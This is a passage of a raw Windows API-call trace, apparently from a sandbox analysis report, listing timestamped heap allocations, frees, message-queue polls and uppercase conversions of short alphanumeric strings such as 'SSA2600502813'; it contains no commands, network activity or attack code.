Size=0x1) returned 0x2a719d8 [0209.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0209.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xeb64) returned 0x2aae878 [0209.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71aa8 [0209.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0209.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0209.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ac8 [0209.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0209.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0209.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ae8 [0209.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0209.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa648 [0209.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0209.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0209.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0209.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0209.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xeb64) returned 0x2acbf58 [0209.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0209.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0209.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0209.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0209.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0209.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0209.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0209.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0209.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0209.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0209.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0209.843] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0209.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0209.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0209.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0209.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0209.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0209.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0209.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0209.843] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0209.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0209.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0209.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0209.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0209.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0209.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0209.844] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0209.844] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0209.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0209.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0209.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0209.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0209.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0209.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0209.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0209.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0209.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0209.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.844] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0209.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0209.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0209.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0209.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0209.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0209.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0209.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0209.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0209.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0209.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0209.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0209.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.845] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0209.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0209.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0209.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0209.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0209.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0209.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0209.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0209.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0209.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0209.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0209.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0209.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0209.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0209.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.846] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0209.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0209.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0209.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0209.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0209.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0209.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0209.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0209.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0209.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0209.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0209.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0209.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0209.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.846] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0209.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0209.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0209.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0209.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0209.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0209.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0209.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0209.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0209.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0209.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0209.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0209.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0209.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.847] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0209.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0209.847] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0209.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0209.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0209.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa68 [0209.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0209.847] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0209.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0209.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0209.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0209.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0209.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0209.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0209.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0209.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0209.848] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0209.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0209.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0209.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0209.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0209.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0209.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0209.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0209.848] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0209.848] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0209.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0209.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0209.848] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0209.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0209.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab020 [0209.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73e90 [0209.848] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0209.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0209.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0209.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0209.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0209.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0209.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0209.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0209.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0209.849] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0209.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0209.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0209.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0209.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0209.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0209.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0209.849] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0209.849] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0209.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0209.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0209.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0209.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0209.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0209.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0209.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0209.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0209.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0209.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0209.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0209.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73e90 | out: hHeap=0x2af0000) returned 1 [0209.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0209.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0209.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0209.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0209.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0209.850] RtlAllocateHeap 